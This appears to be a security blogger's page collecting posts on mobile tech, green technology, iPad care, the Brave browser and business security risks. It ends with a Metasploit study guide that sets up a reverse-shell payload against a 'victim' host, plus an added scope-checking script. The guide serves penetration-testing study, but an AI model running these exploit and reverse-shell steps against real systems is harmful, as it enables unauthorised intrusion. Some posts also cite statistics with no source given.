Will Chatham is a Cyber Security Analyst, Ethical Hacker, and Penetration Tester at a data center in Asheville, NC. Since Netscape 2.0, he has worked in a wide array of environments including non-profit, corporate, small business, and government. His varied background, from developer to search engine optimizer to security professional, has helped him build a wide range of skills that help those with whom he works and teaches.


Here are my most recent posts


Mobile Tech: The Past, Present, And Future

Mobile tech is a huge talking point for anyone that loves technology. What we want to do today is take a look at its past, present, and future. What was mobile tech like a decade or so ago? What’s it like now? And, what will it be like in the future? Find all this out here:

Past

In the past, mobile technology was incredibly simple. It was all about creating a device that you can carry around with you to send messages and make calls.

Then, it evolved into a device that allowed you to take pictures and access the internet. In the past, if your phone had internet connectivity, it was seen as something quite remarkable.

Mobile technology was very basic when it first burst on the scene, but things have definitely changed since then, as you will see in the section below.

Present

We’re currently living in a world that is absolutely dominated by mobile technology. The smartphone boom is real, and everyone has at least one mobile device of some sort. Perhaps the key piece of mobile tech right now has to be apps. Mobile apps are huge, they’re useful across so many different industries, and there’s an app for just about anything. It feels like if you have an idea, you just need to find a mobile app company and they can turn that idea into an app. Apps bring people closer to businesses and news outlets because an app sends notifications and provides people with updated information without them having to do anything.

As well as mobile apps, we see loads of other tech-related things too, such as biometric scanning and incredible cameras. Most phones now come equipped with fingerprint scanners as an added security measure. Likewise, most mobile devices also have cameras capable of shooting pictures and videos in extremely high-quality resolutions – we’ve even seen a 4k smartphone camera!

To sum up, there are loads of current trends in mobile technology. Apps are huge from a business standpoint, whereas security and cameras are big things from the consumer view. We’re also seeing a few trends that are laying the foundations for future mobile tech, and they’ll be discussed below.

Future

It’s always difficult to predict the future, but we can be fairly certain of a few future mobile tech trends, most notably virtual and augmented reality. Mobile devices will soon all be compatible with virtual reality headsets, and that will be reflected in the new types of games and apps that are developed.

Similarly, augmented reality will be a huge thing from an app developer standpoint too. We’ve already seen augmented reality games like Pokemon Go be a huge hit. In a few years, most apps will try and integrate augmented reality in some way.

How can we be sure of this? Because there are already a few smartphones and developers that are getting on this trend. Just look at Samsung and their VR headset, or Google and their Google Cardboard.

As you can see, mobile technology has come a long way since its inception. Even though things are very advanced now, it looks like there’s still a very bright future too.

Technology Can Save the World!

For a lot of people, we’re living in pretty scary times. Climate change is the sort of thing that seems so huge that it often feels as though there’s pretty much nothing that we can do about it. For some, the solution is just to avoid thinking about it, something that is certainly not going to do anyone any good! But that doesn’t mean that you should just be constantly worrying about it either. In fact, there are some things that are making a real difference to our impact on the environment, and many of those things are coming from the world of technology. There has been a major push over the last few years toward tech that can help work against the damage that has been done to the planet. So, in the spirit of helping people feel a little bit more positive about the world we live in, here are some amazing ways that technology is saving the world.

Solar power

It’s truly amazing that such an incredible, renewable source of power and energy has been right under our noses for so long. Of course, the problem for the longest time has been how to actually harness that power in a useful and productive way. Over the last couple of decades, there have been some incredible advances in solar technology, but there are some that are just around the corner that just might revolutionize it all over again. Things like solar windows have shown that it’s possible to integrate solar cells into all manner of items. Check out this article on powertechnology.com to find out more about the incredible things that solar windows can do. Within the next couple of decades, solar cells could be incorporated into pretty much anything: homes, clothes; you name it!

Electric vehicles

Let’s face it, the burning of fossil fuels is the major source of humanity’s major impact on climate change. Of course, a great deal of that impact is down to large companies, factories, and industries, but that doesn’t mean there isn’t also an impact on a more personal level. The vehicles that we drive have undoubtedly had an impact on the environment. The issue is that we simply need our vehicles to get around. That’s where companies like theelectricrider.com come in. By producing affordable electric vehicles, companies like this are making clean, energy-efficient transport available to far more people than ever before.

Nuclear energy

A lot of people tend to feel very odd at even the slightest mention of nuclear energy. The image of radioactive disasters and massive levels of destruction ends up coloring people’s opinions despite the fact that it has the potential to be an incredibly clean, renewable resource. There are now new types of reactors that are designed to turn nuclear waste into power. We’re not quite at the level of nuclear fusion yet, but many of these fission reactors are far safer and more viable than anyone could have ever predicted. Many of these reactors aim to put the fears and concerns that many people have about nuclear energy to bed permanently.

The iPad Health Dump

The iPad has literally changed the way of entertainment over the last few years. At first, it received some criticism, with some saying it was just a big phone without the phone, and that there are various security issues with it. However, it has stood the test of time and it has become a grade-A companion for millions of people across the world. The iPad is used expertly by many, but there are still some areas of concern for some. So, here are some hints and tips that can help you not only get the best out of your iPad, but keep it safe too.

Use A Case

So many people don’t use cases or screen protectors. An iPad’s size makes it more vulnerable to a drop than a phone. Make sure you protect it. Get a solid back case that wraps around when not in use. You can use a screen protector too if you wish to keep the screen free from scratches and abrasions. You can find some cool cases at ithingum.com. What you use it for dictates the case needed. For example, if you work on a construction site, get something solid and hard, but if you use it around the house, something softer is fine. Don’t ruin your iPad by a silly drop. Mistakes are made, so try to protect it as much as you can.

Virus Protection

Staying with protection, you also need to protect it from external threats. Many people think their phones and tablets aren’t at risk from viruses, but they are essentially computers and as a result can become affected just the same. If you open a dodgy email attachment that has been designed to attack iOS, then you could be in trouble. They have built-in security, but you would be better off using software to protect it from attack. You could lose all kinds of photos, messages, and other memories if you haven’t backed it up in some time. Here are some of the better security apps you can make the most of.

Don’t Leave It In Direct Sunlight

You may have seen the message that comes up, warning that the system cannot work because it is too hot. This is a great addition by Apple that can stop it breaking, but remember, it still gets damaged. Doing this can sizzle the internal components. You may not notice anything right away, but over time it may become sluggish and not charge properly. Don’t leave it in direct sunlight because it will be damaged; if you have to, keep it face down and ensure it is under a cover for enhanced shade.

Charge It Right

Try to ensure you charge the device right so that it doesn’t lose charge over time. The newer products are better, but if you have an older one and you don’t charge it properly, you could end up losing huge chunks of it. This is why sometimes it jumps from certain numbers down to one or two, simply because the device is confused. You can find the correct charging methods from Apple themselves.

Just In Time, the Brave Browser Becomes My Default

Last night I saw a respected security professional I follow on Twitter mention the Brave web browser, and how good he thought the mobile version is. Brave was started by the Mozilla Project co-founder Brendan Eich, and is based on Chromium, the open-source base that Google Chrome is constructed upon.

Today, I caught wind that Chrome is soon going to prevent you from doing things such as disabling its DRM management feature called Widevine. The problem with this is summarized here:

…a single browser may now require two different DRM plugins to play all DRM content. These plugins have their own security issues, but unlike with the Flash vulnerabilities, security researchers are banned from looking for them, due to Section 1201 of the Digital Millennium Copyright Act (DMCA). That means malicious hackers, who already engage in other criminal activities, may freely take advantage of all the vulnerabilities they find in these DRM plugins before companies discover them on their own.

In short, because of the closed nature of the DMCA, we end users are at risk unnecessarily, and we will soon have no ability to disable this plugin should we wish to do so.

Enter The Brave

Brave offers a browser that works on all platforms (Windows, Mac, Linux) and on mobile. It blocks ads by default, blocks malware, and is lean and fast. Putting user privacy and security at the forefront, along with speed, this thing is a powerhouse as it forces https on websites and prevents malware-serving advertisement networks from invading your workspace.

But the difference is the paradigm shift in supporting advertisers, as opposed to simply blocking them out completely:

Brave intends to keep 15% of ad revenue for itself, pay content publishers 55%, ad partners 15% and also give 15% to the browser users, who can in turn donate to bloggers and other providers of web content through micropayments.

I have yet to figure out how or if that will work, exactly, and it doesn’t seem to be fully implemented in the browser yet, but it seems like a great way to solve the elephant-in-the-room problem the Internet faces today: how to earn money and keep users safe at the same time, so that they don’t need to run ad blockers and anti-tracking plugins?

Stay tuned for more info as I learn it, and as I figure out Brave.

Read Now If Your Employees Are Using 123RandomWord As Their Password

Ever since the internet rose up from the mists of nowhere, security breaches have been a source of big news, terrifying news. Whether it is the likes of Yahoo being hacked, or Election Results being tampered with, hacking scandals seem to be rearing their ugly heads more often than not. We read story after story about security leaks and each one ends with the same paragraph, the same foregone conclusion; businesses and business leaders need to up their game when it comes to protecting the sensitive data they hold. That is the common message from security experts, and yet so many businesses still don’t prepare themselves properly. Because they have been targeted and affected, they don’t take it seriously enough to seek out the weak links in their business, research the most recent trend in threats, and thus fail to protect themselves and their clients/customers from any breach.

Don’t believe us? Well, the recent State of Risk report concluded that a majority of businesses – big and small – have not invested in a system that will protect, control and track the sensitive data they have been entrusted with. The majority have no system, or only a partial one, in place. Trust us, if Yahoo is struggling to hold their defensive line against hackers then, chances are, you are going to struggle too. That’s why it is imperative to invest in security. Put it this way, the average cost incurred by a cyber breach on a small or medium-sized business is £325,000.

I thought that would grab your attention.

So what preventative measures can you take? How do you best protect yourself and your customers? How do you make sure you are doing all you can to prevent a security breach? How do you stop your sensitive data getting into the wrong hands? Well, we have conducted thorough interviews with security experts to hear what they say, and have compiled a list of the most common areas of weakness in most businesses.

  1. On The Go Tech

In the early 90s and before, a data hack would mean someone would have to hack into your servers or break into your premises in order to access your sensitive data. But those days are gone, and data theft has been made so much simpler by the rise in mobile technology. Simply put, mobile devices increase your vulnerability and thus increase the risk. Of course, mobile devices are a must-have for all employees these days because they increase flexibility and productivity, and reduce the issue of wasted time and resource. However, the more your employees use these devices to share data and access your servers or fail to change their passwords, the more risk you are at. In fact, mobile breaches account for almost three-quarters of all breaches, a rise that mimics the rise of the bring-your-device-to-work policy that so many companies are embracing.

As such, it is imperative that you renew your BYOD policy so that it carefully spells out certain rules and expectations. This will better educate your workforce on the risks. A great way to make this more effective is to relate security breaches at work to the risks they face at home; make it relatable to personal risks like using ATM machines. You should also ensure that you have the capabilities to better monitor mobile devices. This way you will be able to quickly pinpoint any breach or any weakness.

  2. Uneducated Employees

We don’t mean uneducated in terms of schooling, we mean uneducated regarding security, and that means your training program is letting them down. But, yes, all too often your employees are a security risk. It could be that an employee leaves their laptop on a table in Costa as they nip to the bathroom, or a smartphone gets left on the subway, or in a taxi. All of these pose serious threats to your security. But it is not just about exposure outside the office. Too many employees are not educated on the importance of a strong password, what constitutes a strong password or how often they should change their password. This leaves you exposed on the inside. The same goes for training on what to look out for when it comes to suspicious emails.

Cyber attacks have got more and more sophisticated. The phishing techniques have improved, spear phishing is now called upon, unauthorized websites are now able to install malware without the user knowing, and all of these pose a serious threat to both your systems and your data. That is why training is so important, and regular training too, as this will allow you to renew their understanding as different trends arise. A great way to do this is to approach digital learning companies who have experience in this kind of training. This will offer you a cost-effective means of training that is not just interactive and engaging but offers an audit trail too. They will know how to teach your employees about passwords, phishing, keylogging and much more.

  3. Inside Jobs

It is hard to say exactly where an internal attack originates, but it is typically unhappy or disgruntled employees. What’s more, these account for a seriously high number of breaches. Of course, any inside attack will require in-depth knowledge of your IT systems and will require someone to have access to all areas of your network, which is why most inside attacks come from within the IT Department. A disgruntled employee working within IT support can create a huge amount of problems.

How you can prevent this weakness is a challenge, but it requires mitigating any chance of employees in this sector becoming disgruntled. This is not always possible, so it is crucial you identify all those that have access to all areas of the server, this way you will be able to act quickly should an event happen. Another step should be to terminate access to anyone that no longer works within this capacity as soon as possible.

  4. The Cloud

The most effective way to protect all data that is stored in the cloud is to encrypt any access at ground level. Different experts suggest different encryption software, but all suggestions usually represent the gold standard in this field. We can’t stress enough the importance of investing in this kind of security. Since the cloud first originated, a high proportion of cyber attacks have been made possible by companies not using data level encryption devices to protect data stored up high, so make sure you invest well and invest fast.

  5. Third Parties

There are a few reasons why outsourcing has become more and more attractive. It is cost-effective, it frees up resource time, it allows experts to address what is becoming a more and more complex area. It could be you outsource the maintenance of your server, or your point of sale system, or a myriad of other things. However, while they may be experts in protecting you, third-party providers sometimes don’t follow best practices themselves. It may be they use one password to connect to all of their clients, for example, which poses a threat should that password be hacked.

As such, you should always ask as many questions as you possibly can. Make sure they follow the best practices of remote access security, and enforce stringent policies for their workforce to uphold, and use sophisticated authentication techniques to ensure there are unique credentials required for each user. The other step you must take is to know which third parties you are using and then terminate their access as soon as their contract runs out or as soon as they no longer require access.

Quick Metasploit Guide

These are some notes I find myself referring back to as I work through my studies for the OSCP exam. As I develop more of these, I’ll continue to post them here on my blog so that others might find them useful.

Use Kali Linux for all the following instructions.

Prep:
Ensure postgresql is running.

$> /etc/init.d/postgresql start

Set postgres to start on boot so you don’t have to worry about it again:
$> sudo update-rc.d postgresql enable

From the command line, fire up the Metasploit console:
$> msfconsole

Search for exploits related to what you are interested in:
msf> search smb

Or, be more specific:
msf> search name:smb type:exploit platform:windows

Or, in Kali, use searchsploit (from regular command line, outside of MSF):
$> searchsploit smb

Once you find an exploit you want to use, use it:
msf> use exploit/windows/smb_hack

Then set a payload:
msf> set PAYLOAD windows/shell/reverse_tcp

See what options are set:
msf> show options

Set options as needed:

LHOST is the IP address the victim host will send info to (e.g., your Kali VM):

msf> set LHOST 192.168.0.x

RHOST is the IP of the victim
msf> set RHOST 192.168.1.x

Default port is 80, but choose one if you wish:
msf> set RPORT 8081

Run the exploit:
msf> exploit

If you are trying to get a remote shell, be aware that you may already be looking at it even when it seems that nothing is happening. Just try executing a command and see what happens:
ls

dir

pwd

id
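A pre-flight check for the option values set in the steps above, as an added example that is not part of the original notes: it catches an `x` placeholder left in LHOST or RHOST, an out-of-range RPORT, and an RHOST outside the address ranges you are authorised to test. The function names, the scope argument and all addresses are assumptions made for illustration.

```sh
#!/bin/sh
# Added example: pre-flight check for LHOST / RHOST / RPORT values.
# Function names, the scope list and all addresses are constructed.

# Print a dotted-quad IPv4 address as a 32-bit integer; fail on bad input.
ip_to_int() {
    local old_ifs o
    case $1 in
        *[!0-9.]*|*..*|.*|*.) return 1 ;;
    esac
    old_ifs=$IFS; IFS=.; set -- $1; IFS=$old_ifs
    [ $# -eq 4 ] || return 1
    for o in "$@"; do
        case $o in
            0|[1-9]|[1-9][0-9]|[1-9][0-9][0-9]) ;;   # no leading zeros
            *) return 1 ;;
        esac
        [ "$o" -le 255 ] || return 1
    done
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# Succeed if address $1 lies inside CIDR block $2 (e.g. 192.168.1.0/24).
in_cidr() {
    local addr net bits mask
    case $2 in */*) ;; *) return 1 ;; esac
    addr=$(ip_to_int "$1") || return 1
    net=$(ip_to_int "${2%/*}") || return 1
    bits=${2#*/}
    case $bits in
        [0-9]|[12][0-9]|3[0-2]) ;;
        *) return 1 ;;
    esac
    mask=$(( (0xFFFFFFFF << (32 - bits)) & 0xFFFFFFFF ))
    [ $(( addr & mask )) -eq $(( net & mask )) ]
}

# preflight LHOST RHOST RPORT "SCOPE": SCOPE is a space-separated list of
# authorised CIDR blocks. Prints each problem; returns non-zero if any.
preflight() {
    local lhost="$1" rhost="$2" rport="$3" scope="$4" cidr bad=0 hit=0
    if ! ip_to_int "$lhost" >/dev/null; then
        echo "LHOST is not a valid IPv4 address: $lhost"; bad=1
    fi
    if ! ip_to_int "$rhost" >/dev/null; then
        echo "RHOST is not a valid IPv4 address: $rhost"; bad=1
    else
        for cidr in $scope; do
            if in_cidr "$rhost" "$cidr"; then hit=1; fi
        done
        if [ "$hit" -eq 0 ]; then
            echo "RHOST $rhost is outside the authorised scope: $scope"; bad=1
        fi
    fi
    case $rport in
        ''|*[!0-9]*|0*|??????*) rport=0 ;;   # not a plain port number
    esac
    if [ "$rport" -lt 1 ] || [ "$rport" -gt 65535 ]; then
        echo "RPORT must be a number from 1 to 65535"; bad=1
    fi
    if [ "$lhost" = "$rhost" ]; then
        echo "LHOST and RHOST are the same address"; bad=1
    fi
    return "$bad"
}

# Constructed lab values; the second call keeps a literal "x" placeholder.
preflight 192.168.0.10 192.168.1.20 8081 "192.168.1.0/24" && echo "settings OK"
preflight 192.168.0.10 192.168.1.x 8081 "192.168.1.0/24" || echo "fix the settings first"
```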
